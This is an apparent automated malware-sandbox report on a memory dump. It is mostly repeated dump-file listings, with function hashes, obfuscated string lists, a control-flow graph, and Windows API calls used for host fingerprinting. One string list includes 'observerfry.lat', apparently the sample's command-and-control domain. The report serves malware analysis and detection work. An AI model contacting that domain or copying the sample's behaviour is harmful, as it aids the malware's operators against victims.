                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
                                                                                                                                                                                                                              • API String ID: 0-1985396431
                                                                                                                                                                                                                              • Opcode ID: 819223abaff28eccd8245dca955f1f5e23488d64601f27e1b2e48ffc4e82051a
                                                                                                                                                                                                                              • Instruction ID: 121d0cc13865cb63ad343f952a4d3f0610fbfc55de1323e6af6712f92812cf81
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 819223abaff28eccd8245dca955f1f5e23488d64601f27e1b2e48ffc4e82051a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E13C03250C3C08ED3359B3984483AFBFE1ABD6324F198A6DD4D987382D6B989459B53
                                                                                                                                                                                                                              Function 00FF2E6D Relevance: 48.8, APIs: 3, Strings: 24, Instructions: 1505COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: #E#G$%"$+A#C$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$observerfry.lat$s$wdnf$~SS}$rp
                                                                                                                                                                                                                              • API String ID: 0-3004701125
                                                                                                                                                                                                                              • Opcode ID: ae05de846be61d23d6a0fcf8544df8b9711ec8ff08a8b5fc38676a8337e3f349
                                                                                                                                                                                                                              • Instruction ID: 0be259130e2c70690d5c760336c10daeb70a065ee9724a73e139d4085927e694
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae05de846be61d23d6a0fcf8544df8b9711ec8ff08a8b5fc38676a8337e3f349
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11B222B2A08301CFD724CF29C8917ABBBE2FF85310F19866CE5859B395D7799901CB91
                                                                                                                                                                                                                              Function 00FE58D5 Relevance: 29.6, APIs: 1, Strings: 15, Instructions: 1631COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                              • API String ID: 0-510280711
                                                                                                                                                                                                                              • Opcode ID: 51171ce83934d8977ec45a6a72cf0a550821763fc923a8af363850b05fcdbae5
                                                                                                                                                                                                                              • Instruction ID: c656233989e90ea6dd23e02fe6d7637073e6c2db65e899de0a63096834fb23e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51171ce83934d8977ec45a6a72cf0a550821763fc923a8af363850b05fcdbae5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44B227B2A083808FD7348F25D8917AB77E2FFD5354F19892DE4C98B296D7399801DB42
                                                                                                                                                                                                                              Function 01009280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1147 1009280-10092a4 1148 10092b0-10092d7 1147->1148 1148->1148 1149 10092d9-10092ef 1148->1149 1150 10092f0-1009322 1149->1150 1150->1150 1151 1009324-100936a 1150->1151 1152 1009370-100938c 1151->1152 1152->1152 1153 100938e-10093a7 1152->1153 1155 100942a-1009435 1153->1155 1156 10093ad-10093b6 1153->1156 1158 1009440-100947b 1155->1158 1157 10093c0-10093d9 1156->1157 1157->1157 1159 10093db-10093ee 1157->1159 1158->1158 1160 100947d-10094de 1158->1160 1161 10093f0-100941e 1159->1161 1164 10094e4-1009515 1160->1164 1165 1009906-1009932 call 100fe00 GetVolumeInformationW 1160->1165 1161->1161 1163 1009420-1009425 1161->1163 1163->1155 1166 1009520-100954d 1164->1166 1170 1009934-1009938 1165->1170 1171 100993c-100993e 1165->1171 1166->1166 1168 100954f-1009576 SysAllocString 1166->1168 1174 10098f5-1009902 1168->1174 1175 100957c-1009596 CoSetProxyBlanket 1168->1175 1170->1171 1173 1009950-1009957 1171->1173 1176 1009970-100998f 1173->1176 1177 1009959-1009960 1173->1177 1174->1165 1178 10098eb-10098f1 1175->1178 1179 100959c-10095b4 1175->1179 1181 1009990-10099b2 1176->1181 1177->1176 1180 1009962-100996e 1177->1180 1178->1174 1183 10095c0-100961e 1179->1183 1180->1176 1181->1181 1184 10099b4-10099ca 1181->1184 1183->1183 1185 1009620-100969f 1183->1185 1186 10099d0-1009a06 1184->1186 1191 10096a0-10096ff 1185->1191 1186->1186 1187 1009a08-1009a2e call fee960 1186->1187 1192 1009a30-1009a37 1187->1192 1191->1191 1193 1009701-100972d 1191->1193 1192->1192 1194 1009a39-1009a4c 1192->1194 1202 1009733-1009755 1193->1202 1203 10098d6-10098e7 SysFreeString * 2 1193->1203 1196 1009940-100994a 1194->1196 1197 1009a52-1009a65 call fd7fd0 1194->1197 1196->1173 1199 1009a6a-1009a71 1196->1199 1197->1196 1205 100975b-100975e 1202->1205 1206 10098cc-10098d2 1202->1206 1203->1178 1205->1206 1207 1009764-1009769 1205->1207 1206->1203 1207->1206 1208 100976f-10097b7 1207->1208 1210 10097c0-10097d4 1208->1210 1210->1210 1211 10097d6-10097e0 1210->1211 1212 10097e4-10097e6 1211->1212 1213 10098bb-10098c8 1212->1213 1214 10097ec-10097f2 1212->1214 1213->1206 1214->1213 1215 10097f8-1009806 1214->1215 1216 1009808-100980d 1215->1216 1217 100983d 1215->1217 1219 100981c-1009820 1216->1219 1220 100983f-1009877 call fd7f50 call fd8e10 1217->1220 1221 1009810 1219->1221 1222 1009822-100982b 1219->1222 1231 10098a7-10098b7 call fd7f60 1220->1231 1232 1009879-100988f 1220->1232 1224 1009811-100981a 1221->1224 1225 1009832-1009836 1222->1225 1226 100982d-1009830 1222->1226 1224->1219 1224->1220 1225->1224 1228 1009838-100983b 1225->1228 1226->1224 1228->1224 1231->1213 1232->1231 1233 1009891-100989e 1232->1233 1233->1231 1235 10098a0-10098a3 1233->1235 1235->1231
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00001F7A), ref: 01009550
                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0100958F
                                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 010098DF
                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 010098E5
                                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0100992E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
